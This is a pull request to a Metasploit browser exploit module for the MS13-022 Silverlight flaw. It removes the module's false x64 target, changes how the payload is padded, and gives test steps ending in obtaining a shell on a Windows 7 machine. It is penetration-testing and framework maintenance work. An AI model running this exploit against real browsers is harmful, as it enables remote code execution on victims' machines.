### PR TITLE
Drop ungenuine x64 support in ms13_022_silverlight_script_object

### DIFF
--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
         to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
         to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class
         from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP
-        SP3 / Windows 7 SP1 on both x32 and x64 architectures.
+        SP3 / Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -55,7 +55,6 @@ class Metasploit3 < Msf::Exploit::Remote
           'EXITFUNC'             => 'thread'
         },
       'Platform'       => 'win',
-      'Arch'           => [ARCH_X86, ARCH_X86_64],
       'BrowserRequirements' =>
         {
           :source      => /script|headers/i,
@@ -65,14 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
-          [ 'Windows x86',
+          [ 'Windows x86/x64',
             {
               'arch' => ARCH_X86
-            }
-          ],
-          [ 'Windows x64',
-            {
-              'arch' => ARCH_X86_64
             }
           ]
         ],
@@ -96,10 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote
     my_payload = get_payload(cli, target_info)
 
     # Align to 4 bytes the x86 payload
-    if target_info[:arch] == ARCH_X86
-      while my_payload.length % 4 != 0
-        my_payload = "\x90" + my_payload
-      end
+    while my_payload.length % 4 != 0
+      my_payload = "\x90" + my_payload
     end
 
     my_payload = Rex::Text.encode_base64(my_payload)


### PR DESCRIPTION
The MS13-022 exploit does not actually run as x64. IE by default still runs 32-bit so BES will always automatically select that target.

If IE forces x64 (which can be done manually), the BES detection code will see it as ARCH_X86_64, and the payload generator will still end up generating a x86 payload anyway.

If the user actually chooses a x64 payload, such as windows/x64/meterpreter/reverse_tcp, the exploit is going to crash because you can't run x64 shellcode in a 32-bit payload or process.

I pointed out this issue yesterday with @jvazquez-r7, plus he worked on this module, so I'd like to assign this PR to him to verify.
## Test
- [x] Get a Windows 7 box
- [x] Install the vulnerable version of Silverlight: http://www.oldapps.com/silverlight.php?old_silverlight=7667
- [x] Run the module: `./msfconsole -x "use exploit/windows/browser/ms13_022_silverlight_script_object; run"`
- [x] You should get a shell
